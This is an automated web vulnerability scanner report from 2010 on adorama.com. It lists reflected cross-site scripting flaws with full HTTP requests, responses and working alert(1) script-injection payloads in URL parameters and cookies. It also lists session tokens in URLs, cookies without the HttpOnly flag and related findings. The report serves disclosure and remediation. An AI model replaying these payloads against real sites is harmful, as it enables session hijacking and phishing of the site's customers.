adorama.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

Cross Site Scripting in adorama.com | Vulnerability Crawler Report

Report generated by XSS.CX at Mon Dec 27 10:29:25 CST 2010.


Contents

1. Cross-site scripting (reflected)


Contents

Loading

1.1. http://www.adorama.com/Catalog.tpl [name of an arbitrarily supplied request parameter]

1.2. http://www.adorama.com/Catalog.tpl [sku parameter]

1.3. http://www.adorama.com/catlite.tpl [sku parameter]

1.4. http://www.adorama.com/alc/ [refby cookie]

1.5. http://www.adorama.com/alc/ [sid3 cookie]

1.6. http://www.adorama.com/catalog.tpl [sid3 cookie]

2. Session token in URL

2.1. http://www.adorama.com/CARS80N3.html

2.2. http://www.adorama.com/CZDRHSCA.html

2.3. http://www.adorama.com/CZFPC1DIV.html

2.4. http://www.adorama.com/GBSLBK.html

2.5. http://www.adorama.com/ICA1DM4.html

2.6. http://www.adorama.com/ICA1DM4KA.html

2.7. http://www.adorama.com/ICAACKE4.html

2.8. http://www.adorama.com/ICALPE4.html

2.9. http://www.adorama.com/IDSCFEP8G60M.html

2.10. http://www.adorama.com/IDSSDX316G.html

2.11. http://www.adorama.com/IMXWP129.html

2.12. http://www.adorama.com/IMXWP179.html

2.13. http://www.adorama.com/LPRZTLZ20BK.html

2.14. http://www.adorama.com/catalog.tpl

3. ASP.NET ViewState without MAC enabled

4. Cookie without HttpOnly flag set

4.1. http://www.adorama.com/ICA1DM4.html

4.2. http://www.adorama.com/ecommerce/showcartsummary.aspx

4.3. http://www.adorama.com/

4.4. http://www.adorama.com/SearchSite/AjaxHelperService.asmx/LoadDispatcher

4.5. http://www.adorama.com/alc/

4.6. http://www.adorama.com/catalog.tpl

4.7. http://www.adorama.com/refby.tpl

5. Cross-domain Referer leakage

5.1. http://www.adorama.com/Catalog.tpl

5.2. http://www.adorama.com/ICA1DM4.html

5.3. http://www.adorama.com/catalog.tpl

5.4. http://www.adorama.com/catalog.tpl

5.5. http://www.adorama.com/catalog.tpl

5.6. http://www.adorama.com/catalog.tpl

5.7. http://www.adorama.com/catalog.tpl

5.8. http://www.adorama.com/ps/catalog.pl

5.9. http://www.adorama.com/searchsite/default.aspx

6. Cross-domain script include

6.1. http://www.adorama.com/

6.2. http://www.adorama.com/CARS80N3.html

6.3. http://www.adorama.com/CZDRHSCA.html

6.4. http://www.adorama.com/CZFPC1DIV.html

6.5. http://www.adorama.com/GBSLBK.html

6.6. http://www.adorama.com/ICA1DM4.html

6.7. http://www.adorama.com/ICA1DM4KA.html

6.8. http://www.adorama.com/ICAACKE4.html

6.9. http://www.adorama.com/ICALPE4.html

6.10. http://www.adorama.com/IDSCFEP8G60M.html

6.11. http://www.adorama.com/IDSSDX316G.html

6.12. http://www.adorama.com/IMXWP129.html

6.13. http://www.adorama.com/IMXWP179.html

6.14. http://www.adorama.com/LPRZTLZ20BK.html

6.15. http://www.adorama.com/alc/

6.16. http://www.adorama.com/catalog.tpl

6.17. http://www.adorama.com/catalog.tpl

6.18. http://www.adorama.com/catalog.tpl

6.19. http://www.adorama.com/searchsite/default.aspx

7. Email addresses disclosed

7.1. http://www.adorama.com/

7.2. http://www.adorama.com/ICA1DM4.html

7.3. http://www.adorama.com/ainc/emailCheck.js

7.4. http://www.adorama.com/ainc/overlib.js

7.5. http://www.adorama.com/catalog.tpl

7.6. http://www.adorama.com/catalog.tpl

7.7. http://www.adorama.com/ps/catalog.pl

7.8. http://www.adorama.com/searchsite/default.aspx

8. HTML does not specify charset

8.1. http://www.adorama.com/

8.2. http://www.adorama.com/Experiment/HPN/Old

8.3. http://www.adorama.com/FixCookie.tpl

8.4. http://www.adorama.com/catalog.tpl

8.5. http://www.adorama.com/catlite.tpl

8.6. http://www.adorama.com/ecommerce/images/icon_shoppingcart.gif/

8.7. http://www.adorama.com/ecommerce/images/icon_wishlist.gif/

8.8. http://www.adorama.com/ps/catalog.pl

8.9. http://www.adorama.com/searchsite/default.aspx

9. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 6 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.adorama.com/Catalog.tpl [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /Catalog.tpl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12d67"><script>alert(1)</script>2de6d889351 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Catalog.tpl?op=itemlist&cat1=Video&cat2=Consumer%20Video&cat3=Camcorders&feature2=HD&12d67"><script>alert(1)</script>2de6d889351=1 HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:34:29 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:34:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: sweeps=T
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: il_image_view=yes; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Content-Length: 70278

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


               
...[SNIP]...
<link rel="canonical" href="http://www.adorama.com/catalog.tpl?op=itemlist&cat1=Video&cat2=Consumer%20Video&cat3=Camcorders&feature2=HD&12d67"><script>alert(1)</script>2de6d889351=1"/>
...[SNIP]...

1.2. http://www.adorama.com/Catalog.tpl [sku parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /Catalog.tpl

Issue detail

The value of the sku request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94306"-alert(1)-"96376c115d3 was submitted in the sku parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog.tpl?op=ReviewWrapper&sku=ICA1DM494306"-alert(1)-"96376c115d3 HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:32:34 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:32:34 GMT
Content-Length: 22548
Connection: close
Set-Cookie: sweeps=T
Set-Cookie: sid3=20101225230855189ky; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/
Set-Cookie: ABFlag=89; expires=Wednesday, 09-Nov-2200 23:12:40 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


                <hea
...[SNIP]...
<script type="text/javascript">
var pr_page_id = "ICA1DM494306"-alert(1)-"96376c115d3"
var pr_merchant_id = 9721;
var pr_source = "web";
</script>
...[SNIP]...

1.3. http://www.adorama.com/catlite.tpl [sku parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catlite.tpl

Issue detail

The value of the sku request parameter is copied into the HTML document as text between TITLE tags. The payload a31f0</title><script>alert(1)</script>2662c2c3d03 was submitted in the sku parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /catlite.tpl?op=large_imagemulti&sku=ICA1DM4a31f0</title><script>alert(1)</script>2662c2c3d03 HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Expires: Sun, 26 Dec 2010 04:33:28 GMT
Mime-Version: 1.0
Content-Type: text/html
Date: Sun, 26 Dec 2010 04:33:28 GMT
Content-Length: 2544
Connection: close


<HTML>


           <html>
<head>
<title>Large Image Adorama Sku#ICA1DM4a31f0</title><script>alert(1)</script>2662c2c3d03</title>
<meta http-equiv="Content-Type" c
...[SNIP]...

1.4. http://www.adorama.com/alc/ [refby cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /alc/

Issue detail

The value of the refby cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f372"-alert(1)-"25e0d815ee7 was submitted in the refby cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alc/ HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=1f372"-alert(1)-"25e0d815ee7; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Pragma: no-cache
Server: Microsoft-IIS/6.0
Expires: -1
ServerID: 4
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:36:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=r1mveousnbuvok45wxke4cj4; path=/; HttpOnly
Set-Cookie: sid3=20101225230855189ky; expires=Wed, 26-Dec-2040 04:36:34 GMT; path=/
Set-Cookie: KeepLoggedIn=false; expires=Wed, 26-Dec-2040 04:36:34 GMT; path=/
Set-Cookie: sub=; path=/
Set-Cookie: sterm=; path=/
Set-Cookie: refby=; path=/
Set-Cookie: gclid=; path=/
Set-Cookie: ETjobid=; path=/
Content-Length: 98726


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-- -->

...[SNIP]...
<!--
_udl=new cloneObject(_udl);
_udl.search='?utm_term='+escape("Other")+'&utm_medium=Others&utm_campaign='+escape("Other")+'&utm_source='+escape("1f372"-alert(1)-"25e0d815ee7")+'&';
//-->
...[SNIP]...

1.5. http://www.adorama.com/alc/ [sid3 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /alc/

Issue detail

The value of the sid3 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb519"-alert(1)-"727bfc212e3 was submitted in the sid3 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alc/ HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189kybb519"-alert(1)-"727bfc212e3; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Pragma: no-cache
Pragma: no-cache
Server: Microsoft-IIS/6.0
Expires: -1
ServerID: 10
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=rx4kz255sv2o4q3khzvaoj55; path=/; HttpOnly
Set-Cookie: sid3=20101225230855189kybb519"-alert(1)-"727bfc212e3; expires=Wed, 26-Dec-2040 04:36:28 GMT; path=/
Set-Cookie: KeepLoggedIn=false; expires=Wed, 26-Dec-2040 04:36:28 GMT; path=/
Content-Length: 98483


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-- -->

...[SNIP]...
ript" language="JavaScript1.2">
if (typeof(tagVars) == "undefined") tagVars = "";
tagVars += "&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&VISITORVAR!sid=A20101225230855189kybb519"-alert(1)-"727bfc212e3";
</script>
...[SNIP]...

1.6. http://www.adorama.com/catalog.tpl [sid3 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adorama.com
Path:   /catalog.tpl

Issue detail

The value of the sid3 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88960"><script>alert(1)</script>cb2374af735 was submitted in the sid3 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /catalog.tpl?op=process&func=buy&sku=ICA1DM4KA&sc_url=ICA1DM4.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky88960"><script>alert(1)</script>cb2374af735; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response (redirected)

HTTP/1.1 200 OK
Pragma: no-cache
Server: Microsoft-IIS/6.0
Expires: -1
ServerID: 6
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Date: Sun, 26 Dec 2010 04:33:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ABFlag=89; expires=Wed, 26-Dec-2040 04:33:52 GMT; path=/
Set-Cookie: ASP.NET_SessionId=amq5qfeyhof5zkffqngrl345; path=/; HttpOnly
Set-Cookie: CPM=; expires=Sat, 26-Dec-2009 04:33:52 GMT; path=/
Set-Cookie: sid3=20101225230855189ky88960"><script>alert(1)</script>cb2374af735; expires=Wed, 26-Dec-2210 04:33:52 GMT; path=/
Content-Length: 55285


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>
       
   Shopp
...[SNIP]...
<a href="http://www.adoramapix.com/?sid=20101225230855189ky88960"><script>alert(1)</script>cb2374af735" id="pix">
...[SNIP]...

2. Session token in URL  previous  next
There are 14 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. http://www.adorama.com/CARS80N3.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /CARS80N3.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /CARS80N3.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52562

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.2. http://www.adorama.com/CZDRHSCA.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /CZDRHSCA.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /CZDRHSCA.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 14
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48303

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.3. http://www.adorama.com/CZFPC1DIV.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /CZFPC1DIV.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /CZFPC1DIV.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 5
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41107

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

2.4. http://www.adorama.com/GBSLBK.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.adorama.com
Path:   /GBSLBK.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /GBSLBK.html HTTP/1.1
Host: www.adorama.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid3=20101225230855189ky; sub=; __utmv=113083348.%2FExperiment%2FHPN%2FOld; e=; __utmz=113083348.1293336513.1.1.utmcsr=become|utmccn=Other|utmcmd=Others|utmctr=Other; Session_Refby=become; l=; ETjobid=; AJAXrefby=; j=; u=; sterm=; refby=; header_refby=become; __utma=113083348.1012902736.1293336513.1293336513.1293336513.1; mid=; KeepLoggedIn=false; ABFlag=89; __utmc=113083348; ci_tag=become; __utmb=113083348.2.10.1293336513; ci_tid=12420-null-6180938567201011622833183;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
ServerID: 18
X-Powered-By: ASP.NET
Content-Type: text/html; charset=utf-8
Cache-Control: private
X-AspNet-Version: 2.0.50727
Date: Sun, 26 Dec 2010 04:33:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60711

<div style="display: none">products page hidden div</div>


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml
...[SNIP]...
<font color="#CC0000"><a href='https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&byhref=1&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2/liveperson' target='chat12511569' onClick="javascript:window.open('https://server.iad.liveperson.net/hc/12511569/?cmd=file&file=visitorWantsToChat&site=12511569&SESSIONVAR!skill=Adorama%20Camera%20Sales/costumer%20service&imageUrl=https://www.adorama.com/artworks2&referrer='+escape(document.location),'chat12511569','width=472,height=320');return false;" ><img src='https://server.iad.liveperson.net/hc/12511569/?cmd=repstate&site=12511569&channel=web&&ver=1&imageUrl=https://www.adorama.com/artworks2/liveperson&skill=Adorama%20Camera%20Sales/costumer%20se
...[SNIP]...

